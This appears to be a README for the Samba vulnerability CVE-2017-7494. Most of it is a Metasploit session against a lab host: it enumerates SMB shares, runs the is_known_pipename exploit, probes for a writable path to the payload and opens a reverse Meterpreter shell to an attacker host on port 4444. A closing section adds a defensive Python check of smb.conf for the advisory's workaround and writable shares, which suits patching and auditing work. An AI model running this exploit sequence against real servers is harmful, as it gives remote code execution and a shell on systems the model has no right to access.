CVE-2017-7494

msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set RHOSTS 192.168.206.144
RHOSTS => 192.168.206.144
msf auxiliary(smb_enumshares) > run

[+] 192.168.206.144:139   - print$ - (DISK) Printer Drivers
[+] 192.168.206.144:139   - CVE20177494 - (DISK) CVE20177494
[+] 192.168.206.144:139   - IPC$ - (IPC) IPC Service (Samba 4.5.2-Debian)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.206.144
RHOST => 192.168.206.144
msf exploit(is_known_pipename) > set target 0
target => 0
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.206.144  yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.206.1:4444
[*] 192.168.206.144:445 - Using location \\192.168.206.144\CVE20177494\ for the path
[*] 192.168.206.144:445 - Hunting for payload using common path names: VZiaULDJ.so - //192.168.206.144/CVE20177494/
[*] 192.168.206.144:445 - Trying location /volume1/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /tmp/VZiaULDJ.so...
[*] Sending stage (797784 bytes) to 192.168.206.144
[*] Meterpreter session 1 opened (192.168.206.1:4444 -> 192.168.206.144:58682) at 2017-05-26 05:52:19 -0500

meterpreter >
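
A defender-side check for the configuration this session depends on, added here as an example and not part of the original repository: it parses smb.conf text and reports whether the `nt pipe support = no` workaround from the Samba advisory (reference 1) is set and which shares are writable. The sample configuration is constructed (only the share name is taken from the session above), and `include` directives are not followed.

```python
import re

TRUE = {"yes", "true", "on", "1"}
FALSE = {"no", "false", "off", "0"}
INVERTED = {"writeable", "writable", "writeok"}  # inverted synonyms of "read only"

def parse_smb_conf(text):
    """Parse smb.conf text into {section: {param: value}} (no include support)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":           # blank line or comment
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = sections.setdefault(header.group(1).strip(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            # Samba ignores case and whitespace inside parameter names.
            key, value = re.sub(r"\s+", "", key).lower(), value.strip().lower()
            if key in INVERTED:                    # fold synonyms so the last setting wins
                key, value = "readonly", "no" if value in TRUE else "yes"
            current[key] = value
    return sections

def audit(text):
    """Report the two configuration preconditions for CVE-2017-7494."""
    conf = parse_smb_conf(text)
    glob = next((v for k, v in conf.items() if k.lower() == "global"), {})
    # Default is "nt pipe support = yes", so a missing key means no workaround.
    workaround = glob.get("ntpipesupport", "yes") in FALSE
    default_ro = glob.get("readonly", "yes")       # [global] sets share defaults
    writable = [name for name, p in conf.items()
                if name.lower() != "global" and p.get("readonly", default_ro) in FALSE]
    return {"workaround_applied": workaround,
            "writable_shares": writable,
            "preconditions_met": bool(writable) and not workaround}

# Constructed sample: the share name comes from the session above, the rest is assumed.
SAMPLE = """
[global]
   server string = Samba test
[CVE20177494]
   path = /tmp
   writable = yes
   guest ok = yes
"""
HARDENED = SAMPLE.replace("[global]", "[global]\n   nt pipe support = no")

if __name__ == "__main__":
    print(audit(SAMPLE))
    print(audit(HARDENED))
```

The input can also be the output of `testparm -s`, which prints the configuration as Samba parsed it. The workaround only reduces exposure; upgrading to a fixed Samba release is the remedy.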

References

  1. https://www.samba.org/samba/security/CVE-2017-7494.html
  2. rapid7/metasploit-framework#8450
  3. https://download.samba.org/pub/samba/
  4. https://wiki.samba.org/index.php/Build_Samba_from_Source
  5. https://github.com/omri9741/cve-2017-7494